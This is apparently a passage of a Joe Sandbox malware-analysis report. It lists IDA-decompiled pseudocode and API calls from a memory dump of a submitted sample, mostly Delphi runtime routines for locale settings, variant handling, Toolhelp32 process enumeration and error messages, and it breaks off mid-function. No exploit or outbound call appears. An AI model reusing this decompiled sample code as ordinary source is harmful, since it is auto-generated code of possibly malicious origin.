    				char _v11;
    				char _v16;
    				intOrPtr _t28;
    				void* _t31;
    				void* _t33;
    
    				_t33 = __eflags;
    				_v16 = 0;
    				_push(_t31);
    				_push(0x40b318);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t31 + 0xfffffff4;
    				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
    				E004040F8( &_v16, 7,  &_v11);
    				_push(_v16);
    				E00407174(7, GetACP(), _t33);
    				_pop(_t28);
    				 *[fs:eax] = _t28;
    				_push(E0040B31F);
    				return E00403E88( &_v16);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
    				char _v260;
    				intOrPtr _t10;
    				void* _t18;
    
    				_t18 = __ecx;
    				_t10 = _a4;
    				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
    					return E00403EDC(_t10, _t18);
    				}
    				return E00403F78(_t10, _t5 - 1,  &_v260);
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
    				char _v16;
    				char _t5;
    				char _t6;
    
    				_push(__ecx);
    				_t6 = __ecx;
    				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
    					_t5 = _t6;
    				} else {
    					_t5 = _v16;
    				}
    				return _t5;
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00417A70() {
    
    				if( *0x454a18 == 0) {
    					 *0x454a18 = GetModuleHandleA("kernel32.dll");
    					if( *0x454a18 != 0) {
    						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
    						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
    						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
    						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
    						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
    						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
    						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
    						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
    						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
    						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
    						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
    						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
    						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
    						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
    						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
    						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
    					}
    				}
    				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
    					return 0;
    				} else {
    					return 1;
    				}
    			}




    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040CA40() {
    				struct HINSTANCE__* _v8;
    				intOrPtr _t46;
    				void* _t91;
    
    				_v8 = GetModuleHandleA("oleaut32.dll");
    				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
    				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
    				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
    				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
    				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
    				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
    				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
    				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
    				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
    				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
    				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
    				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
    				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
    				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
    				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
    				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
    				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
    				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
    				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
    				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
    				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
    				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
    				 *0x4547f4 = _t46;
    				return _t46;
    			}







    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
    				char _t5;
    				char _t6;
    				CHAR* _t7;
    				char _t9;
    				CHAR* _t11;
    				char _t14;
    				CHAR* _t15;
    				char _t17;
    				CHAR* _t19;
    				CHAR* _t22;
    				CHAR* _t23;
    				CHAR* _t32;
    				intOrPtr _t33;
    				intOrPtr* _t34;
    				void* _t35;
    				void* _t36;
    
    				_t34 = __edx;
    				_t22 = __eax;
    				while(1) {
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L4:
    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
    						_t36 = 0;
    						_t32 = _t22;
    						while(1) {
    							_t6 =  *_t22;
    							if(_t6 <= 0x20) {
    								break;
    							}
    							if(_t6 != 0x22) {
    								_t7 = CharNextA(_t22);
    								_t36 = _t36 + _t7 - _t22;
    								_t22 = _t7;
    								continue;
    							}
    							_t22 = CharNextA(_t22);
    							while(1) {
    								_t9 =  *_t22;
    								if(_t9 == 0 || _t9 == 0x22) {
    									break;
    								}
    								_t11 = CharNextA(_t22);
    								_t36 = _t36 + _t11 - _t22;
    								_t22 = _t11;
    							}
    							if( *_t22 != 0) {
    								_t22 = CharNextA(_t22);
    							}
    						}
    						E00404478(_t34, _t36);
    						_t23 = _t32;
    						_t33 =  *_t34;
    						_t35 = 0;
    						while(1) {
    							_t14 =  *_t23;
    							if(_t14 <= 0x20) {
    								break;
    							}
    							if(_t14 != 0x22) {
    								_t15 = CharNextA(_t23);
    								if(_t15 <= _t23) {
    									continue;
    								} else {
    									goto L27;
    								}
    								do {
    									L27:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t15 > _t23);
    								continue;
    							}
    							_t23 = CharNextA(_t23);
    							while(1) {
    								_t17 =  *_t23;
    								if(_t17 == 0 || _t17 == 0x22) {
    									break;
    								}
    								_t19 = CharNextA(_t23);
    								if(_t19 <= _t23) {
    									continue;
    								} else {
    									goto L21;
    								}
    								do {
    									L21:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t19 > _t23);
    							}
    							if( *_t23 != 0) {
    								_t23 = CharNextA(_t23);
    							}
    						}
    						return _t23;
    					} else {
    						_t22 =  &(_t22[2]);
    						continue;
    					}
    				}
    			}




















    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
    				void _v1024;
    				char _v1088;
    				long _v1092;
    				void* _t12;
    				char* _t14;
    				intOrPtr _t16;
    				intOrPtr _t18;
    				intOrPtr _t24;
    				long _t32;
    
    				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
    				_t14 =  *0x45308c; // 0x454044
    				if( *_t14 == 0) {
    					_t16 =  *0x452f6c; // 0x405f30
    					_t9 = _t16 + 4; // 0xffe9
    					_t18 =  *0x454660; // 0x400000
    					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
    					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
    				}
    				_t24 =  *0x452f90; // 0x454214
    				E00402784(E00402A8C(_t24));
    				CharToOemA( &_v1024,  &_v1024);
    				_t32 = E00407764( &_v1024, __edi);
    				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
    				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
    			}













    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00401A74() {
    				void* _t2;
    				void* _t3;
    				void* _t14;
    				intOrPtr* _t19;
    				intOrPtr _t23;
    				intOrPtr _t26;
    				intOrPtr _t28;
    
    				_t26 = _t28;
    				if( *0x4545bc == 0) {
    					return _t2;
    				} else {
    					_push(_t26);
    					_push(E00401B4A);
    					_push( *[fs:edx]);
    					 *[fs:edx] = _t28;
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L0040130C();
    					}
    					 *0x4545bc = 0;
    					_t3 =  *0x45461c; // 0x0
    					LocalFree(_t3);
    					 *0x45461c = 0;
    					_t19 =  *0x4545e4; // 0x4545e4
    					while(_t19 != 0x4545e4) {
    						_t1 = _t19 + 8; // 0x0
    						VirtualFree( *_t1, 0, 0x8000);
    						_t19 =  *_t19;
    					}
    					E00401374(0x4545e4);
    					E00401374(0x4545f4);
    					E00401374(0x454620);
    					_t14 =  *0x4545dc; // 0x0
    					while(_t14 != 0) {
    						 *0x4545dc =  *_t14;
    						LocalFree(_t14);
    						_t14 =  *0x4545dc; // 0x0
    					}
    					_pop(_t23);
    					 *[fs:eax] = _t23;
    					_push(0x401b51);
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L00401314();
    					}
    					_push(0x4545c4);
    					L0040131C();
    					return 0;
    				}
    			}











    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				void* _t104;
    				void* _t111;
    				void* _t133;
    				intOrPtr _t183;
    				intOrPtr _t193;
    				intOrPtr _t194;
    
    				_t191 = __esi;
    				_t190 = __edi;
    				_t193 = _t194;
    				_t133 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t133 = _t133 - 1;
    				} while (_t133 != 0);
    				_push(__ebx);
    				_push(_t193);
    				_push(0x40b7df);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t194;
    				E0040B3A0();
    				E00409E60(__ebx, __edi, __esi);
    				_t196 =  *0x454744;
    				if( *0x454744 != 0) {
    					E0040A038(__esi, _t196);
    				}
    				_t132 = GetThreadLocale();
    				E00409DB0(_t43, 0, 0x14,  &_v20);
    				E00403EDC(0x454678, _v20);
    				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
    				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
    				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
    				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
    				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
    				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
    				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
    				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
    				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
    				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
    				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
    				E00403EDC(0x454684, _v36);
    				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
    				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
    				E00403EDC(0x454688, _v44);
    				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
    				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
    				E00403EDC(0x454690, _v52);
    				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
    				E00403EDC(0x454694, _v56);
    				E00403E88( &_v12);
    				E00403E88( &_v16);
    				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
    				_t104 = E00407174(0x40b7f4, 0, _t196);
    				_t197 = _t104;
    				if(_t104 != 0) {
    					E00403F20( &_v8, 0x40b84c);
    				} else {
    					E00403F20( &_v8, 0x40b840);
    				}
    				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
    				_t111 = E00407174(0x40b7f4, 0, _t197);
    				_t198 = _t111;
    				if(_t111 == 0) {
    					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
    					if(E00407174(0x40b7f4, 0, _t198) != 0) {
    						E00403F20( &_v12, 0x40b868);
    					} else {
    						E00403F20( &_v16, 0x40b858);
    					}
    				}
    				_push(_v12);
    				_push(_v8);
    				_push(":mm");
    				_push(_v16);
    				E00404208();
    				_push(_v12);
    				_push(_v8);
    				_push(":mm:ss");
    				_push(_v16);
    				E00404208();
    				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
    				_pop(_t183);
    				 *[fs:eax] = _t183;
    				_push(E0040B7E6);
    				return E00403EAC( &_v68, 0x10);
    			}


























    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
    				char _v260;
    				char _v768;
    				char _v772;
    				short* _v776;
    				intOrPtr _v780;
    				char _v784;
    				signed int _v788;
    				signed short* _v792;
    				char _v796;
    				char _v800;
    				intOrPtr* _v804;
    				void* __ebp;
    				signed char _t47;
    				signed int _t54;
    				void* _t62;
    				intOrPtr* _t73;
    				intOrPtr* _t91;
    				void* _t93;
    				void* _t95;
    				void* _t98;
    				void* _t99;
    				intOrPtr* _t108;
    				void* _t112;
    				intOrPtr _t113;
    				char* _t114;
    				void* _t115;
    
    				_t100 = __ecx;
    				_v780 = __ecx;
    				_t91 = __edx;
    				_v776 = __eax;
    				if(( *(__edx + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t47 =  *_t91;
    				if((_t47 & 0x00000fff) != 0xc) {
    					_push(_t91);
    					_push(_v776);
    					L0040C5A0();
    					return E0040D7EC(_v776);
    				} else {
    					if((_t47 & 0x00000040) == 0) {
    						_v792 =  *((intOrPtr*)(_t91 + 8));
    					} else {
    						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
    					}
    					_v788 =  *_v792 & 0x0000ffff;
    					_t93 = _v788 - 1;
    					if(_t93 < 0) {
    						L9:
    						_push( &_v772);
    						_t54 = _v788;
    						_push(_t54);
    						_push(0xc);
    						L0040C9F4();
    						_t113 = _t54;
    						if(_t113 == 0) {
    							E0040D544(_t100);
    						}
    						E0040DB18(_v776);
    						 *_v776 = 0x200c;
    						 *((intOrPtr*)(_v776 + 8)) = _t113;
    						_t95 = _v788 - 1;
    						if(_t95 < 0) {
    							L14:
    							_t97 = _v788 - 1;
    							if(E0040DB34(_v788 - 1, _t115) != 0) {
    								L0040CA0C();
    								E0040D7EC(_v792);
    								L0040CA0C();
    								E0040D7EC( &_v260);
    								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
    							}
    							_t62 = E0040DB64(_t97, _t115);
    						} else {
    							_t98 = _t95 + 1;
    							_t73 =  &_v768;
    							_t108 =  &_v260;
    							do {
    								 *_t108 =  *_t73;
    								_t108 = _t108 + 4;
    								_t73 = _t73 + 8;
    								_t98 = _t98 - 1;
    							} while (_t98 != 0);
    							do {
    								goto L14;
    							} while (_t62 != 0);
    							return _t62;
    						}
    					} else {
    						_t99 = _t93 + 1;
    						_t112 = 0;
    						_t114 =  &_v772;
    						do {
    							_v804 = _t114;
    							_push(_v804 + 4);
    							_t18 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040C9FC();
    							E0040D7EC(_v792);
    							_push( &_v784);
    							_t21 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040CA04();
    							E0040D7EC(_v792);
    							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
    							_t112 = _t112 + 1;
    							_t114 = _t114 + 8;
    							_t99 = _t99 - 1;
    						} while (_t99 != 0);
    						goto L9;
    					}
    				}
    			}

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
    				long _v4;
    				int _t3;
    
    				if( *0x454044 == 0) {
    					if( *0x419030 == 0) {
    						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
    					}
    					return _t3;
    				} else {
    					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
